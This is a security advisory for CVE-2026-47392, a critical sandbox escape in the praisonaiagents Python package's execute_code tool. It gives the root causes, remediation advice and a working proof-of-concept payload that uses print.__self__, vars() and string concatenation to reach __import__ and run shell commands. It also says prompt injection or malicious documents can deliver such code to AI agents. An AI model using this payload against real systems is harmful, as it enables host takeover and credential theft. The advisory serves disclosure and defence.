PYSEC-2026-483
See a problem?- Import Source
- https://github.com/pypa/advisory-database/blob/main/vulns/praisonaiagents/PYSEC-2026-483.yaml
- JSON Data
- https://api.osv.dev/v1/vulns/PYSEC-2026-483
- Aliases
-
- CVE-2026-47392
- GHSA-4mr5-g6f9-cfrh
- PYSEC-2026-463
- Published
- 2026-06-29T11:50:50.769396Z
- Modified
- 2026-06-29T12:26:46.215625163Z
- Severity
-
- 9.9 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H CVSS Calculator
- Summary
- PraisonAI vulnerable to sandbox escape via `print.__self__` builtins module leak in `execute_code` (subprocess mode)
- Details
-
Summary
execute_code()inpraisonaiagents/tools/python_tools.py(v1.6.37, subprocess sandbox mode) can be fully bypassed usingprint.__self__to retrieve the real Pythonbuiltinsmodule, from which__import__can be extracted viavars()and runtime string construction. This achieves arbitrary OS command execution on the host, completely defeating the sandbox.This is a novel bypass that survives all patches for CVE-2026-39888 (frame traversal), CVE-2026-34938 (str subclass), and CVE-2026-40158 (
type.__getattribute__trampoline).
Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H — 9.9 Critical
Root Cause
Three independent gaps in the AST-based security validation:
Gap 1:
__self__missing from_blocked_attrsIn CPython, all built-in functions (C-level functions) have a
__self__attribute that returns the module they belong to. The built-in functions insafe_builtins(print,len,range, etc.) are the real CPython built-in functions, soprint.__self__returns<module 'builtins' (built-in)>.The
_blocked_attrsfrozenset (line 52) does NOT include__self__. The AST check at line 74 only blocks attributes that are IN this set, soprint.__self__passes.Gap 2:
varsnot blocked as callable or attributebuiltins.vars(obj)returnsobj.__dict__. The function namevarsis not in the ASTCallblocklist (line 83: only blocksexec,eval,compile,__import__,open,input,breakpoint,setattr,delattr,dir). Andvarsis not in_blocked_attrsfor attribute access.So
b.vars(b)(wherebis the builtins module) returnsbuiltins.__dict__— a dict containing ALL built-in functions including__import__,exec,eval,open, etc.Gap 3: AST
Callcheck only catchesast.NamenodesThe dangerous-call check (line 82-88) only fires when
isinstance(func, ast.Name)— i.e., bare-name calls likeexec(...). It does NOT catch: - Attribute calls:b.exec(...)— func isast.Attribute- Subscript calls:d["exec"](...)— func isast.SubscriptGap 4: Runtime string construction bypasses string constant check
The string constant check (line 92-98) catches literals like
"__import__", but NOT runtime concatenation like"_" + "_" + "import" + "_" + "_". The AST sees 5 separateConstantnodes ("_","_","import","_","_"), none of which contain any blocked attr as a substring.
Proof of Concept
from praisonaiagents.tools.python_tools import execute_code # Exploit: 4 lines, bypasses ALL security layers payload = """ b = print.__self__ d = b.vars(b) key = "_" + "_" + "import" + "_" + "_" imp = d[key] mod = imp("os") print(mod.popen("id").read()) """ result = execute_code(code=payload) print(result) # Output: {'result': None, 'stdout': 'uid=1000(user) gid=1000(user) ...\n', 'stderr': '', 'success': True}Step-by-step bypass analysis:
| Line | AST node | Check | Result | |---|---|---|---| |
print.__self__|Attribute(attr='__self__')|__self__in_blocked_attrs? | NO → passes | |b.vars|Attribute(attr='vars')|varsin_blocked_attrs? | NO → passes | |b.vars(b)|Call(func=Attribute)|isinstance(func, ast.Name)? | NO → passes | |"_","import"|Constant(value=str)| Contains blocked attr? | NO → passes | |d[key]|Subscript| Not checked | passes | |imp("os")|Call(func=Name('imp'))|impin blocked calls? | NO → passes |Result: Full sandbox escape → arbitrary command execution
Impact
An attacker who can influence agent input (via prompt injection, malicious documents, or direct code submission) can:
- Execute arbitrary commands on the host system
- Read/write any file accessible to the process
- Exfiltrate environment variables, API keys, and credentials
- Pivot to internal networks
- Install persistent backdoors
Affected
- Package:
praisonaiagents(PyPI) - Affected versions: All versions through 1.6.37 (latest)
- Component:
praisonaiagents/tools/python_tools.py,_execute_code_sandboxed()function- Default configuration affected: Yes (
sandbox_mode="sandbox"is the default)
- Default configuration affected: Yes (
Remediation
Immediate fix
Add
__self__to_blocked_attrs:python _blocked_attrs = frozenset({ ..., '__self__', # Built-in functions leak their parent module })Additional hardening
- Block
varsin the callable blocklist - Extend the
ast.Callcheck to also catchast.Attributeandast.Subscriptfunction nodes - Add AST check for
BinOpstring concatenation that could construct blocked attr names
Fundamental recommendation
Denylist-based Python sandboxes are fundamentally insecure. Each patch introduces a new bypass opportunity. Consider: - Using
isolated-vm(Node.js) or WebAssembly-based isolation - Using OS-level sandboxing (seccomp, namespaces, gVisor) - Removing in-process code execution entirely in favor of containerized execution - References
Affected packages
PyPI / praisonaiagents
Package
- Name
- praisonaiagents
- View open source insights on deps.dev
- Purl
- pkg:pypi/praisonaiagents
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed1.6.40